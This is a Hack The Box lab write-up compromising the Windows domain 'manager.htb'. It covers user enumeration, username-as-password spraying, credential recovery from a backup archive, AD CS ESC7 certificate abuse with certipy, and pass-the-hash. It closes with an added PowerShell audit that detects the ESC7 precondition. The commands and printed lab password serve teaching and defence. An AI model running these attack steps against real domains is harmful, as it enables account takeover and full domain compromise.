# Manager

January 25, 2026

| Created by | Page | Difficulty | OS |
|---|---|---|---|
| Geiseric | Hack The Box | Medium | Windows |

## Enumeration

I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports:

```bash
nmap -p- --open --min-rate 5000 -Pn -sS 10.129.4.145 -oG scan
/opt/extractports scan
nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49693,49694,49695,49728,49737 -Pn -sCV 10.129.4.145 -oN ports
```

I found the domain manager.htb and added it to my hosts file.

### User enumeration

I enumerated valid domain users using Kerberos pre-authentication checks:

```bash
./kerbrute userenum --dc 10.129.4.145 -d manager.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
```

This returned the following valid users:

- ryan
- cheng
- raven
- administrator
- operator

I then tested whether any users were using their username as their password:

```bash
netexec smb 10.129.4.145 -u usernames -p usernames
```

This revealed that the user operator was using operator:operator as credentials.

## Initial Access – Operator

Using the valid credentials, I enumerated domain information via SMB:

```bash
netexec smb 10.129.4.145 -u operator -p operator --rid-brute
```

I also collected Active Directory data for BloodHound analysis:

```bash
netexec ldap 10.129.4.145 -u operator -p operator --bloodhound --collection All --dns-server 10.129.4.145
```

From the BloodHound data, I observed that raven was the only user belonging to the Remote Management Users group, making it a high-value target.

### MSSQL Enumeration

I authenticated to the MSSQL service using Windows authentication:

```bash
impacket-mssqlclient manager/operator:operator@10.129.4.145 -windows-auth
```

No interesting databases or direct command execution paths were available.
However, I was able to enumerate directories on the system using xp_dirtree:

```sql
EXEC master..xp_dirtree 'C:\', 1, 1;
```

Since a web service was exposed, I listed the IIS web root:

```sql
EXEC master..xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
```

This revealed a backup file named website-backup-27-07-23-old.zip. I downloaded the file via HTTP and extracted it locally. Inside, I found an .old-config.xml file containing credentials for the user raven. I validated the credentials:

```bash
netexec smb 10.129.4.145 -u Raven -p 'R4v3nBe5tD3veloP3r!123'
```

## User Access – Raven

Using the recovered credentials, I authenticated via WinRM and obtained the user flag:

```bash
evil-winrm -i 10.129.4.145 -u Raven -p 'R4v3nBe5tD3veloP3r!123'
```

## Privilege Escalation

I enumerated AD CS misconfigurations using Certipy:

```bash
certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.4.145 -stdout -enabled -vulnerable
```

The domain was vulnerable to ESC7. Since this was not clearly visible in my existing BloodHound data, I collected additional information using SharpHound:

```powershell
.\SharpHound.exe -c All --zipfilename info --ldapusername raven --ldappassword 'R4v3nBe5tD3veloP3r!123'
```

### ESC7 Exploitation

I followed the ESC7 attack path from the post. First, I updated Certipy to a version that supports this attack. Then I granted myself certificate officer rights and requested a certificate with an arbitrary UPN:
```bash
certipy ca -u "raven"@"manager.htb" -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -add-officer raven
certipy req -u "raven"@"manager.htb" -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -template SubCA -upn Administrator
```

Then I issued the pending request and retrieved the certificate:

```bash
certipy ca -u "raven"@"manager.htb" -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -issue-request 25
certipy req -u "raven"@"manager.htb" -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -retrieve 25
```

This produced an Administrator certificate, administrator.pfx.

## Administrator Compromise

Using the certificate, I authenticated as Administrator and obtained the NT hash:

```bash
certipy auth -pfx administrator.pfx -domain manager.htb
```

With the NT hash, I performed a Pass-the-Hash attack and obtained a privileged shell:

```bash
evil-winrm -i 10.129.4.212 -u Administrator -H XXXXXXXXX
```

This granted full administrative access and allowed me to retrieve the root flag.
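The precondition for the ESC7 path above is a non-privileged principal (here, raven) holding ManageCA or ManageCertificates on the CA. The following defender-side audit is an added example, not part of the original writeup; it assumes the PSPKI PowerShell module is installed on a host that can reach the CA, and the allow list of expected CA administrators is an assumption to adjust per domain.

```powershell
# Added example (not from the writeup): audit CA ACLs for the ESC7 precondition.
# Assumes the PSPKI module (Install-Module PSPKI) and that this host can reach the CA.
Import-Module PSPKI

# Principals expected to hold CA management rights (assumption; adjust for your domain).
$allowed = @('BUILTIN\Administrators', 'MANAGER\Domain Admins', 'MANAGER\Enterprise Admins')

function Find-Esc7Candidates {
    param([string[]]$Allowed)
    $findings = @()
    foreach ($ca in Get-CertificationAuthority) {
        # PSPKI returns the CA security descriptor; .Access holds one rule per ACE.
        $acl = $ca | Get-CertificationAuthorityAcl
        foreach ($ace in $acl.Access) {
            # ManageCA lets a principal add officers; ManageCertificates lets an
            # officer issue pending requests. Either one in the wrong hands is ESC7.
            $rights = $ace.Rights.ToString()
            $isMgmt = ($rights -match 'ManageCA') -or ($rights -match 'ManageCertificates')
            $isAllow = $ace.AccessControlType -eq 'Allow'
            $principal = $ace.IdentityReference.Value
            if ($isMgmt -and $isAllow -and ($Allowed -notcontains $principal)) {
                $findings += [pscustomobject]@{
                    CA        = $ca.DisplayName
                    Principal = $principal
                    Rights    = $rights
                }
            }
        }
    }
    return $findings
}

# Every row printed is a candidate ESC7 path worth reviewing.
Find-Esc7Candidates -Allowed $allowed | Format-Table -AutoSize
```

Any principal listed should either be removed from the CA ACL or, if it is a legitimate CA administrator, added to the allow list so the check stays quiet for known-good entries.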